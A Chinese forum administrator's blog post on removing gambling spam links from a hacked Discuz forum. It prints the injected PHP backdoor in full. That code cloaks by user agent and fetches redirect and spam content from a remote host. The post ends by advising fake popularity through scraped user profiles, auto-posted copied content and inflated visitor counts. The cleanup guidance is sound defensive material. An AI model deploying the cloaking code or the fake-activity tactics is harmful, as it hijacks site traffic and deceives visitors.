本人親測有效,原創文章哦~~~
論壇黑鏈非常的麻煩,如果你的論壇有黑鏈,那么對不起,百度收錄了你的黑鏈,不會自動刪除,需要你手動去清理。
什么是黑鏈
黑鏈,顧名思義,就是一些賭博網站的外鏈,這些黑鏈相當的麻煩,因為百度收錄了它們,會降低你的百度權重,甚至K站,如果你用的是國內的空間或者域名,被查到了還可能封站,所以 這個非常的令人頭疼,本文通過幾個不同的角度,來告訴你怎么清黑鏈。
找到黑鏈的源頭
我們先要知道黑鏈的源頭究竟在哪里?黑鏈就像蟑螂,蟑螂喜歡油煙子,喜歡待在廚房里,滋生在下水道里面,無孔不入。那么黑鏈也是一樣,只要你不把源頭堵住,那么,無論你再怎么清理,它還是會來的。以Discuz為例,我們來看看 黑鏈的源頭在哪里。首先,我們必須知道,黑鏈是怎么形成的。黑鏈有幾種形成方式。
- 論壇的漏洞
- 服務器FTP漏洞
- 外鏈漏洞(DISCUZ插件漏洞)
- 執行腳本漏洞
- 注冊漏洞
也許我概括得不太全面,不過基本上是由於這些原因形成的,我不說大話,我就以我現在碰到的漏洞跟大家說一下,我就以一個最常見的論壇注冊漏洞跟大家說一下,大家多多少少也見過,或者接觸過一種叫做注冊機的東西,就是可以批量注冊,當然,如果是站長主動想去注冊的話,那沒問題,因為批量注冊用戶,是一種提高論壇人氣的好方法,但是如果是惡意的,為了發廣告而注冊的賬號,那么就是不好的,所以大家都會用到一些插件,比如拖動滑塊驗證等。
如果你的FTP密碼泄露了,這個是最最麻煩的事情,因為人家都可以進你的雲服務器了,你想下,他是不是可以為所欲為呢?那么他們是怎么進入你的雲服務器的呢?在你神不知鬼不覺的情況下?我總結了如下原因:
- 撞庫攻擊;這個很常見,其實如果你在其他網站上用了同樣的密碼,而這個網站的密碼是不安全的,那么你就可能成為受害者。
- 暴力破解;這個也常見,有專門的軟件,可以進行暴力破解,所以設置密碼的時候,必須要有大小寫,而且沒有規則的密碼,是不容易被破解的,注意密碼長度等。
那么Discuz還有一種更NB的被破解的方式,就是直接注入 一段代碼到你的PHP文件中,所以這時候,DISCUZ的文件對比功能就起效果了,文件對比功能,是對比你的FTP上的系統文件和DISCUZ官方的文件,看看有沒有不同,通常來說,大部分文件,是不需要修改的,如果修改了,那就可以從這里找突破口,看看有沒有蛛絲馬跡。
通過對比,果然發現有文件被篡改過,真是功夫不負有心人啊,在class_core.php中。
注意最上方的一段代碼,這里我把這段PHP粘貼過來,下面這段代碼,會讓你的網站的快照指向賭博網站的鏈接,並且,會生成很多很多的不存在的外鏈。
define('s_u','http://103.192.202.8:88/');
define('s_s','baidu|haosou.com|sogou|yahoo|gogle');
define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());
function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}
if(eregi(s_s,r_s)){$d_s=true;if(eregi("site%3A|inurl%3A",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s && empty($_COOKIE['xx'])){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(eregi(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}
?>
大家知道下一步是做什么嗎?想想智商為負數的人都應該知道,就是把這段代碼給刪除掉,但是僅僅是刪除掉嗎?NO,下面的章節將會告訴你詳細的操作。
利用百度查詢黑鏈規則
如果我們想要刪除黑鏈,首先必須知道黑鏈長什么樣子,黑鏈很難自動被刪掉,即使你把那些賭博鏈接的帖子從論壇里面刪掉了,你會發現,黑鏈的快照依舊存儲在百度的數據庫里面,那么話不多說,給大家推薦一個網址,這個比使用site:www.kmsfan.com 要強多了。http://www.baidu.com/s?ie=utf-8&tn=baidulocal&wd=site%3Awww.kmsfan.com 大家把最后的www.kmsfan.com 替換成自己網站的地址就行了。現在我們 來看看黑鏈 長什么樣子。
從上面的黑鏈舉例來說,我們其實可以得到如下信息。
- 黑鏈入庫時間
- 黑鏈的正則
- 黑鏈的名稱
從黑鏈的入庫時間推算,這個黑鏈如果我們不主動清除的話,它是幾乎 不可能消除的,而且會影響網站后續新帖子的收錄。從黑鏈的正則來看,就是網站域名+thread-帖子ID+頁數-1.html,如果大家沒玩過DISCUZ的話,可能不知道Discuz論壇有一個偽靜態的功能,這個帖子的問題就 在於,它的帖子ID不是正常的ID,因為我論壇總共就5000個帖子,哪來的那么大的ID。從黑鏈的名稱上看,這個是一個賭博鏈接。
再來看一看另一類黑鏈:
我們打開它,看看是不是沒有帖子:
居然有正常的帖子 !!!這是為什么呢?黑鏈不指向404,而是一個正常的帖子,這個原因,我個人的看法是,論壇黑鏈形成的時間比較早,然后已經入了百度的數據庫,當時我把這個帶有黑鏈的帖子給刪除了,然后過了一段時間,這個帖子的ID又被正常的帖子給占據了,但是因為百度已經默認為:你的網站有黑鏈,不刷新收錄,所以這里看到的,是新的帖子,但是百度里面,還是帶有賭博鏈接的舊的帖子。
利用工具Xenu檢測黑鏈
這個工具適用於黑鏈數較少的網站,可以手工清除的,首先我們要去檢測鏈接:http://www.baidu.com/s?ie=utf-8&tn=baidulocal&wd=site%3Awww.kmsfan.com,還是利用這個鏈接,當然了,后面的www.kmsfan.com可以換成你自己的網站的域名,注意勾選:檢測外部鏈接。
注意需要勾選:只顯示無效的鏈接,由於Xenu是外國的,所以人家沒有直接生成百度黑鏈規則的xml,所以只能通過WORD文檔去修改了,這一點有點麻煩,而且網站黑鏈眾多的時候,這個也很難做到完美清除。查詢就講到這里,下面會跟大家說說怎么刪除黑鏈。
百度站長工具VS黑鏈
上面說了這么多,終於進入本話題的重中之重:刪除黑鏈,在刪除黑鏈之前,大家還是需要修補好漏洞,另外告訴大家一個很難被發現的漏洞,大家用過Discuz的人肯定用過php,用過php的人,肯定用過phpMyAdmin這個工具;有人會說,這個工具有什么呢?我告訴大家,這個工具其實就是你在IIS上的一個站點,當你想操作數據庫的時候,就要打開它,如果你不在使用后及時關閉這個站點的話,那么后果是災難性的,我的站點因為這個原因,連管理員都被刪除過。所以,大家一定要小心。
閑話不多說,我們還是進入正題吧,百度站長工具其實是一個很好的東西,當然在使用前,你必須先驗證你的站點,這個和在CNZZ上面加統計一個意思。先給大家放一張我刪除黑鏈的成果圖。
哈哈,大家羡慕了吧,黑鏈雖然沒有全部刪完,但是還是成果頗豐的,那么大家會問,你用的什么方式刪除的呢?那么快,那么有效果。
利用Robots.txt強力刪除
不了解的人也許會笑話我,不就是一個txt文件嗎,有這么NB嗎?我告訴你:有的,參加上圖。那么這個Robots.txt究竟是何方神聖呢?先給大家看看我的Robots.txt
# # robots.txt for Discuz! X3 # User-agent: * Disallow: /api/ Disallow: /data/ Disallow: /source/ Disallow: /install/ Disallow: /template/ Disallow: /config/ Disallow: /uc_client/ Disallow: /uc_server/ Disallow: /static/ Disallow: /admin.php Disallow: /search.php Disallow: /member.php Disallow: /api.php Disallow: /misc.php Disallow: /connect.php Disallow: /forum.php?mod=redirect* Disallow: /forum.php?mod=post* Disallow: /home.php?mod=spacecp* Disallow: /userapp.php?mod=app&* Disallow: /*?mod=misc* Disallow: /*?mod=attachment* Disallow: /*mobile=yes* Disallow: /forum.php?mod=viewthread&tid=* Disallow: /forum.php/forum.php?mod=viewthread&tid=* Disallow: /forum.php/thread-*-2-1.html Disallow: /forum.php/thread-*-3-1.html Disallow: /forum.php/thread-*-4-1.html
其實Discuz已經默認有一個robots.txt了,我只是動了動手腳而已,嘿嘿,我加了如下代碼:
Disallow: /forum.php?mod=viewthread&tid=* Disallow: /forum.php/forum.php?mod=viewthread&tid=* Disallow: /forum.php/thread-*-2-1.html Disallow: /forum.php/thread-*-3-1.html Disallow: /forum.php/thread-*-4-1.html
Disallow其實就是不讓抓取以這個正則為模板的所有帖子,不過Robots不支持復雜的正則表達式,它非常的簡單。大家寫完了以后,需要上傳並更新此文件,百度還提供了一個測試工具,你可以在線測試此正則是否有效;當然了,不是馬上生效哦,估計要1~2個星期,才能起效果,所以,耐心等吧。
利用死鏈提交工具精確刪除
注意,此功能只針對404的鏈接,如果是因為快照沒有更新而造成的收錄不匹配,此方法無效。而且此方法只適用於死鏈較少的網站,這個需要配合Xenu工具,先把死鏈撈出來,然后使用XML或者TXT格式,上傳死鏈鏈接。此方法我個人不太推薦,因為如果鏈接里面有“活的”鏈接,死鏈刪除會失敗。
恢復收錄以及網站吸引人氣的若干方法
當死鏈都清除掉了(當然這是個漫長的過程),你需要的只是等待。當然,如果權重高的網站,那么它收錄的也快一些,這個時候,你 就需要更多的帖子,更多的人,這樣你的網站才會更加的健康和活躍,這樣也吸引人氣。關於網站吸引人氣,如何吸引人氣,我作為一個站長,想要駁斥一種觀點:關系論。就是說,你可以去招募一大批人,作為寫手,來提高網站原創性,不可否認,在網站基本健康的情況下,這個很重要,但是我覺得,關系論只適用於小眾站長,因為很多網站沒有那么多的活躍用戶,也沒有那么多寫手,這個時候,作為站長來說,可以“虛擬”一些人氣出來,我個人的建議(當然純屬個人建議,如果你覺得不妥,可以不這么做),所謂虛擬人氣就是這些東西:
- 批量從其他網站抓取用戶(當然這里只抓取基本的信息),然后作為會員導入
- 采集文章,帖子,回復,然后定時,定量去采集,回復,這樣會讓論壇看起來更加活躍
- 論壇可以虛擬一小部分在線用戶,然后大批量虛擬游客的數量,自己去體會為什么。
總結
一句話概括:離開了需求,離開了用戶,一個只會寫代碼的程序員,沒有任何價值,至少,他不能創造價值。他至少需要懂一點點業務才行。